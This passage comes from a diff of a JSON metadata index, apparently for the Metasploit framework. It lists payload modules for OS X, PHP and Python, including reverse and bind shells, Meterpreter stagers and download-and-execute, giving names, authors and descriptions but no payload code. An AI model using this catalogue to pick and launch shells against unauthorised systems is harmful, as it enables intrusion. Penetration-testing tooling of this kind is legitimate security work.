"/modules/payloads/singles/osx/x86/shell_find_port.rb", + "is_install_path": true, + "ref_name": "osx/x86/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/x86/shell_reverse_tcp": { + "name": "OS X Command Shell, Reverse TCP Inline", + "fullname": "payload/osx/x86/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "OSX", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x86/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/x86/vforkshell/bind_tcp": { + "name": "OS X (vfork) Command Shell, Bind TCP Stager", + "fullname": "payload/osx/x86/vforkshell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ddz " + ], + "description": "Call vfork() if necessary and spawn a command shell (staged).\n\nListen, read length, read buffer, execute", + "references": [], + "platform": "OSX", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/x86/bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x86/vforkshell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/x86/vforkshell", + "stager_refname": "osx/x86/bind_tcp" + }, + "payload_osx/x86/vforkshell/reverse_tcp": { + "name": "OS X (vfork) Command Shell, Reverse TCP Stager", + "fullname": "payload/osx/x86/vforkshell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ddz " + ], + "description": "Call vfork() if necessary and spawn a command shell (staged).\n\nConnect, read length, read buffer, execute", + "references": [], + "platform": "OSX", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/x86/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x86/vforkshell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/x86/vforkshell", + "stager_refname": "osx/x86/reverse_tcp" + }, + "payload_osx/x86/vforkshell_bind_tcp": { + "name": "OS X (vfork) Command Shell, Bind TCP Inline", + "fullname": "payload/osx/x86/vforkshell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ddz " + ], + "description": "Listen for a connection, vfork if necessary, and spawn a command shell", + "references": [], + "platform": "OSX", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x86/vforkshell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/x86/vforkshell_reverse_tcp": { + "name": "OS X (vfork) Command Shell, Reverse TCP Inline", + "fullname": "payload/osx/x86/vforkshell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ddz " + ], + "description": "Connect back to attacker, vfork if necessary, and spawn a command shell", + "references": [], + "platform": "OSX", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x86/vforkshell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_php/bind_perl": { + "name": "PHP Command Shell, Bind TCP (via Perl)", + "fullname": "payload/php/bind_perl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Samy ", + "cazz " + ], + "description": "Listen for a connection and spawn a command shell via perl (persistent)", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/php/bind_perl.rb", + "is_install_path": true, + "ref_name": "php/bind_perl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_php/bind_perl_ipv6": { + "name": "PHP Command Shell, Bind TCP (via perl) IPv6", + "fullname": "payload/php/bind_perl_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Samy ", + "cazz " + ], + "description": "Listen for a connection and spawn a command shell via perl (persistent) over IPv6", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/php/bind_perl_ipv6.rb", + "is_install_path": true, + "ref_name": "php/bind_perl_ipv6", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_php/bind_php": { + "name": "PHP Command Shell, Bind TCP (via PHP)", + "fullname": "payload/php/bind_php", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "egypt ", + "diaul " + ], + "description": "Listen for a connection and spawn a command shell via php", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/php/bind_php.rb", + "is_install_path": true, + "ref_name": "php/bind_php", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_php/bind_php_ipv6": { + "name": "PHP Command Shell, Bind TCP (via php) IPv6", + "fullname": "payload/php/bind_php_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "egypt ", + "diaul " + ], + "description": "Listen for a connection and spawn a command shell via php (IPv6)", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/php/bind_php_ipv6.rb", + "is_install_path": true, + "ref_name": "php/bind_php_ipv6", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_php/download_exec": { + "name": "PHP Executable Download and Execute", + "fullname": "payload/php/download_exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "egypt " + ], + "description": "Download an EXE from an HTTP URL and execute it", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/php/download_exec.rb", + "is_install_path": true, + "ref_name": "php/download_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_php/exec": { + "name": "PHP Execute Command ", + "fullname": "payload/php/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "egypt " + ], + "description": "Execute a single system command", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/php/exec.rb", + "is_install_path": true, + "ref_name": "php/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_php/meterpreter/bind_tcp": { + "name": "PHP Meterpreter, Bind TCP Stager", + "fullname": "payload/php/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "egypt " + ], + "description": "Run a meterpreter server in PHP.\n\nListen for a connection", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/php/bind_tcp.rb", + "is_install_path": true, + "ref_name": "php/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "php/meterpreter", + "stager_refname": "php/bind_tcp" + }, + "payload_php/meterpreter/bind_tcp_ipv6": { + "name": "PHP Meterpreter, Bind TCP Stager IPv6", + "fullname": "payload/php/meterpreter/bind_tcp_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "egypt " + ], + "description": "Run a meterpreter server in PHP.\n\nListen for a connection over IPv6", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/php/bind_tcp_ipv6.rb", + "is_install_path": true, + "ref_name": "php/meterpreter/bind_tcp_ipv6", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "php/meterpreter", + "stager_refname": "php/bind_tcp_ipv6" + }, + "payload_php/meterpreter/bind_tcp_ipv6_uuid": { + "name": "PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support", + "fullname": "payload/php/meterpreter/bind_tcp_ipv6_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "egypt ", + "OJ Reeves" + ], + "description": "Run a meterpreter server in PHP.\n\nListen for a connection over IPv6 with UUID Support", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb", + "is_install_path": true, + "ref_name": "php/meterpreter/bind_tcp_ipv6_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "php/meterpreter", + "stager_refname": "php/bind_tcp_ipv6_uuid" + }, + "payload_php/meterpreter/bind_tcp_uuid": { + "name": "PHP Meterpreter, Bind TCP Stager with UUID Support", + "fullname": "payload/php/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "egypt ", + "OJ Reeves" + ], + "description": "Run a meterpreter server in PHP.\n\nListen for a connection with UUID Support", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/php/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "php/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "php/meterpreter", + "stager_refname": "php/bind_tcp_uuid" + }, + "payload_php/meterpreter/reverse_tcp": { + "name": "PHP Meterpreter, PHP Reverse TCP Stager", + "fullname": "payload/php/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "egypt " + ], + "description": "Run a meterpreter server in PHP.\n\nReverse PHP connect back stager with checks for disabled functions", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/php/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "php/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "php/meterpreter", + "stager_refname": "php/reverse_tcp" + }, + "payload_php/meterpreter/reverse_tcp_uuid": { + "name": "PHP Meterpreter, PHP Reverse TCP Stager", + "fullname": "payload/php/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "egypt ", + "OJ Reeves" + ], + "description": "Run a meterpreter server in PHP.\n\nReverse PHP connect back stager with checks for disabled functions", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/php/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "php/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "php/meterpreter", + "stager_refname": "php/reverse_tcp_uuid" + }, + "payload_php/meterpreter_reverse_tcp": { + "name": "PHP Meterpreter, Reverse TCP Inline", + "fullname": "payload/php/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "egypt " + ], + "description": "Connect back to attacker and spawn a Meterpreter server (PHP)", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/php/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "php/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_php/reverse_perl": { + "name": "PHP Command, Double Reverse TCP Connection (via Perl)", + "fullname": "payload/php/reverse_perl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "cazz " + ], + "description": "Creates an interactive shell via perl", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/php/reverse_perl.rb", + "is_install_path": true, + "ref_name": "php/reverse_perl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_php/reverse_php": { + "name": "PHP Command Shell, Reverse TCP (via PHP)", + "fullname": "payload/php/reverse_php", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "egypt " + ], + "description": "Reverse PHP connect back shell with checks for disabled functions", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/php/reverse_php.rb", + "is_install_path": true, + "ref_name": "php/reverse_php", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_php/shell_findsock": { + "name": "PHP Command Shell, Find Sock", + "fullname": "payload/php/shell_findsock", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "egypt " + ], + "description": "Spawn a shell on the established connection to\n the webserver. Unfortunately, this payload\n can leave conspicuous evil-looking entries in the\n apache error logs, so it is probably a good idea\n to use a bind or reverse shell unless firewalls\n prevent them from working. The issue this\n payload takes advantage of (CLOEXEC flag not set\n on sockets) appears to have been patched on the\n Ubuntu version of Apache and may not work on\n other Debian-based distributions. Only tested on\n Apache but it might work on other web servers\n that leak file descriptors to child processes.", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/php/shell_findsock.rb", + "is_install_path": true, + "ref_name": "php/shell_findsock", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_python/exec": { + "name": "Python Execute Command", + "fullname": "payload/python/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute an arbitrary OS command. Compatible with Python 2.7 and 3.4+.", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-10-04 10:43:40 +0000", + "path": "/modules/payloads/singles/python/exec.rb", + "is_install_path": true, + "ref_name": "python/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_python/meterpreter/bind_tcp": { + "name": "Python Meterpreter, Python Bind TCP Stager", + "fullname": "payload/python/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/python/bind_tcp.rb", + "is_install_path": true, + "ref_name": "python/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/bind_tcp" + }, + "payload_python/meterpreter/bind_tcp_uuid": { + "name": "Python Meterpreter, Python Bind TCP Stager with UUID Support", + "fullname": "payload/python/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "OJ Reeves" + ], + "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection with UUID Support", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/python/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "python/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/bind_tcp_uuid" + }, + "payload_python/meterpreter/reverse_http": { + "name": "Python Meterpreter, Python Reverse HTTP Stager", + "fullname": "payload/python/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/python/reverse_http.rb", + "is_install_path": true, + "ref_name": "python/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_http" + }, + "payload_python/meterpreter/reverse_https": { + "name": "Python Meterpreter, Python Reverse HTTPS Stager", + "fullname": "payload/python/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP using SSL", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/python/reverse_https.rb", + "is_install_path": true, + "ref_name": "python/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_https" + }, + "payload_python/meterpreter/reverse_tcp": { + "name": "Python Meterpreter, Python Reverse TCP Stager", + "fullname": "payload/python/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/python/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "python/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_tcp" + }, + "payload_python/meterpreter/reverse_tcp_ssl": { + "name": "Python Meterpreter, Python Reverse TCP SSL Stager", + "fullname": "payload/python/meterpreter/reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Campbell ", + "RageLtMan" + ], + "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nReverse Python connect back stager using SSL", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/python/reverse_tcp_ssl.rb", + "is_install_path": true, + "ref_name": "python/meterpreter/reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_tcp_ssl" + }, + "payload_python/meterpreter/reverse_tcp_uuid": { + "name": "Python Meterpreter, Python Reverse TCP Stager with UUID Support", + "fullname": "payload/python/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "OJ Reeves" + ], + "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/python/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "python/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_tcp_uuid" + }, + "payload_python/meterpreter_bind_tcp": { + "name": "Python Meterpreter Shell, Bind TCP Inline", + "fullname": "payload/python/meterpreter_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Connect to the victim and spawn a Meterpreter shell", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/python/meterpreter_bind_tcp.rb", + "is_install_path": true, + "ref_name": "python/meterpreter_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_python/meterpreter_reverse_http": { + "name": "Python Meterpreter Shell, Reverse HTTP Inline", + "fullname": "payload/python/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Connect back to the attacker and spawn a Meterpreter shell", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/python/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "python/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_python/meterpreter_reverse_https": { + "name": "Python Meterpreter Shell, Reverse HTTPS Inline", + "fullname": "payload/python/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Connect back to the attacker and spawn a Meterpreter shell", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/python/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "python/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_python/meterpreter_reverse_tcp": { + "name": "Python Meterpreter Shell, Reverse TCP Inline", + "fullname": "payload/python/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Connect back to the attacker and spawn a Meterpreter shell", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/python/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "python/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_python/pingback_bind_tcp": { + "name": "Python Pingback, Bind TCP (via python)", + "fullname": "payload/python/pingback_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "asoto-r7" + ], + "description": "Listens for a connection from the attacker, sends a UUID, then terminates", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/python/pingback_bind_tcp.rb", + "is_install_path": true, + "ref_name": "python/pingback_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_python/pingback_reverse_tcp": { + "name": "Python Pingback, Reverse TCP (via python)", + "fullname": "payload/python/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "asoto-r7" + ], + "description": "Connects back to the attacker, sends a UUID, then terminates", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/python/pingback_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "python/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_python/shell_bind_tcp": { + "name": "Command Shell, Bind TCP (via python)", + "fullname": "payload/python/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mumbai" + ], + "description": "Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/python/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "python/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_python/shell_reverse_sctp": { + "name": "Command Shell, Reverse SCTP (via python)", + "fullname": "payload/python/shell_reverse_sctp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-08 06:44:37 +0000", + "path": 